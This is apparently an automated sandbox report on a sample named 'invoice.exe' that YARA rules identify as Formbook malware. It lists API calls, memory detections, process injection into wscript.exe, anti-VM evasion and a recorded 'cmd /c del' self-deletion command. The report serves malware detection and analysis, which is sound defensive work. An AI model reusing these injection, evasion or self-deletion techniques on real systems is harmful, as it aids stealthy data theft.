Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: invoice.exe
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004181D0 NtCreateFile | 3_2_004181D0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00418280 NtReadFile | 3_2_00418280
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00418300 NtClose | 3_2_00418300
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004183B0 NtAllocateVirtualMemory | 3_2_004183B0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041827A NtReadFile | 3_2_0041827A
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004182FB NtReadFile | 3_2_004182FB
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004183AA NtAllocateVirtualMemory | 3_2_004183AA
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9540 NtReadFile, LdrInitializeThunk | 9_2_046A9540
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A95D0 NtClose, LdrInitializeThunk | 9_2_046A95D0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9660 NtAllocateVirtualMemory, LdrInitializeThunk | 9_2_046A9660
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9650 NtQueryValueKey, LdrInitializeThunk | 9_2_046A9650
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A96E0 NtFreeVirtualMemory, LdrInitializeThunk | 9_2_046A96E0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A96D0 NtCreateKey, LdrInitializeThunk | 9_2_046A96D0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9710 NtQueryInformationToken, LdrInitializeThunk | 9_2_046A9710
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9FE0 NtCreateMutant, LdrInitializeThunk | 9_2_046A9FE0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9780 NtMapViewOfSection, LdrInitializeThunk | 9_2_046A9780
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9860 NtQuerySystemInformation, LdrInitializeThunk | 9_2_046A9860
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9840 NtDelayExecution, LdrInitializeThunk | 9_2_046A9840
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9910 NtAdjustPrivilegesToken, LdrInitializeThunk | 9_2_046A9910
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A99A0 NtCreateSection, LdrInitializeThunk | 9_2_046A99A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9A50 NtCreateFile, LdrInitializeThunk | 9_2_046A9A50
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9560 NtWriteFile | 9_2_046A9560
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9520 NtWaitForSingleObject | 9_2_046A9520
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046AAD30 NtSetContextThread | 9_2_046AAD30
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A95F0 NtQueryInformationFile | 9_2_046A95F0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9670 NtQueryInformationProcess | 9_2_046A9670
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9610 NtEnumerateValueKey | 9_2_046A9610
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9760 NtOpenProcess | 9_2_046A9760
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046AA770 NtOpenThread | 9_2_046AA770
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9770 NtSetInformationFile | 9_2_046A9770
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9730 NtQueryVirtualMemory | 9_2_046A9730
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046AA710 NtOpenProcessToken | 9_2_046AA710
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A97A0 NtUnmapViewOfSection | 9_2_046A97A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046AB040 NtSuspendThread | 9_2_046AB040
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9820 NtEnumerateKey | 9_2_046A9820
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A98F0 NtReadVirtualMemory | 9_2_046A98F0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A98A0 NtWriteVirtualMemory | 9_2_046A98A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9950 NtQueueApcThread | 9_2_046A9950
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A99D0 NtCreateProcessEx | 9_2_046A99D0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9A20 NtResumeThread | 9_2_046A9A20
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9A00 NtProtectVirtualMemory | 9_2_046A9A00
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9A10 NtQuerySection | 9_2_046A9A10
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9A80 NtOpenDirectoryObject | 9_2_046A9A80
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046A9B00 NtSetValueKey | 9_2_046A9B00
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046AA3B0 NtGetContextThread | 9_2_046AA3B0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C8280 NtReadFile | 9_2_021C8280
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C8300 NtClose | 9_2_021C8300
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C83B0 NtAllocateVirtualMemory | 9_2_021C83B0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C81D0 NtCreateFile | 9_2_021C81D0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C827A NtReadFile | 9_2_021C827A
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C82FB NtReadFile | 9_2_021C82FB
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C83AA NtAllocateVirtualMemory | 9_2_021C83AA
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_00802050 | 0_2_00802050
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_011794A8 | 0_2_011794A8
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0117DCF4 | 0_2_0117DCF4
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0117C148 | 0_2_0117C148
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0117E218 | 0_2_0117E218
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0117A748 | 0_2_0117A748
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0117DCE8 | 0_2_0117DCE8
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF0040 | 0_2_02BF0040
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5930 | 0_2_02BF5930
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF1331 | 0_2_02BF1331
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF1340 | 0_2_02BF1340
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF0006 | 0_2_02BF0006
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5558 | 0_2_02BF5558
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5548 | 0_2_02BF5548
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF1A38 | 0_2_02BF1A38
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF1A27 | 0_2_02BF1A27
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5B95 | 0_2_02BF5B95
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5B3B | 0_2_02BF5B3B
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF5B5A | 0_2_02BF5B5A
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF28F7 | 0_2_02BF28F7
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041C803 | 3_2_0041C803
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00401030 | 3_2_00401030
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00408C6B | 3_2_00408C6B
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00408C70 | 3_2_00408C70
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00402D90 | 3_2_00402D90
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041C598 | 3_2_0041C598
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00D72050 | 3_2_00D72050
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0472D466 | 9_2_0472D466
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0467841F | 9_2_0467841F
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04731D55 | 9_2_04731D55
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04660D20 | 9_2_04660D20
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04732D07 | 9_2_04732D07
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0467D5E0 | 9_2_0467D5E0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_047325DD | 9_2_047325DD
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04692581 | 9_2_04692581
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04686E30 | 9_2_04686E30
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0472D616 | 9_2_0472D616
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04732EF7 | 9_2_04732EF7
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04731FF1 | 9_2_04731FF1
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04721002 | 9_2_04721002
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_047328EC | 9_2_047328EC
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046920A0 | 9_2_046920A0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_047320A8 | 9_2_047320A8
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0467B090 | 9_2_0467B090
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04684120 | 9_2_04684120
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0466F900 | 9_2_0466F900
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_047322AE | 9_2_047322AE
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_04732B28 | 9_2_04732B28
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0472DBD2 | 9_2_0472DBD2
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0469EBB0 | 9_2_0469EBB0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CC803 | 9_2_021CC803
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021B2FB0 | 9_2_021B2FB0
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021B8C70 | 9_2_021B8C70
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021B8C6B | 9_2_021B8C6B
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CC598 | 9_2_021CC598
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021B2D90 | 9_2_021B2D90
Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 0466B150 appears 35 times
Source: invoice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: invoice.exe | Binary or memory string: OriginalFilename vs invoice.exe
Source: invoice.exe, 00000000.00000000.221487542.0000000000802000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
Source: invoice.exe, 00000000.00000002.253920792.00000000074A0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll" vs invoice.exe
Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll2 vs invoice.exe
Source: invoice.exe, 00000003.00000000.241463096.0000000000D72000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
Source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs invoice.exe
Source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
Source: invoice.exe | Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
Source: invoice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: invoice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@15/8
Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Users\user\Desktop\invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: unknown | Process created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
Source: C:\Users\user\Desktop\invoice.exe | Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_0081855F push dword ptr [esi+3Fh]; iretd | 0_2_00818571
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_008192CB push FFFFFFD9h; iretd | 0_2_008192E8
Source: C:\Users\user\Desktop\invoice.exe | Code function: 0_2_02BF6A44 push A1FFFFFEh; ret | 0_2_02BF6A49
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004161E2 push 00000062h; ret | 3_2_004161E5
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041B3C5 push eax; ret | 3_2_0041B418
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041B47C push eax; ret | 3_2_0041B482
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041B412 push eax; ret | 3_2_0041B418
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_0041B41B push eax; ret | 3_2_0041B482
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_004157E0 push esi; ret | 3_2_00415809
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00D892CB push FFFFFFD9h; iretd | 3_2_00D892E8
Source: C:\Users\user\Desktop\invoice.exe | Code function: 3_2_00D8855F push dword ptr [esi+3Fh]; iretd | 3_2_00D88571
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_046BD0D1 push ecx; ret | 9_2_046BD0E4
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CB3C5 push eax; ret | 9_2_021CB418
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C61E2 push 00000062h; ret | 9_2_021C61E5
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021C57E0 push esi; ret | 9_2_021C5809
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CB41B push eax; ret | 9_2_021CB482
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CB412 push eax; ret | 9_2_021CB418
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_021CB47C push eax; ret | 9_2_021CB482
Source: initial sample | Static PE information: section name: .text entropy: 7.55515603565
Source: C:\Users\user\Desktop\invoice.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3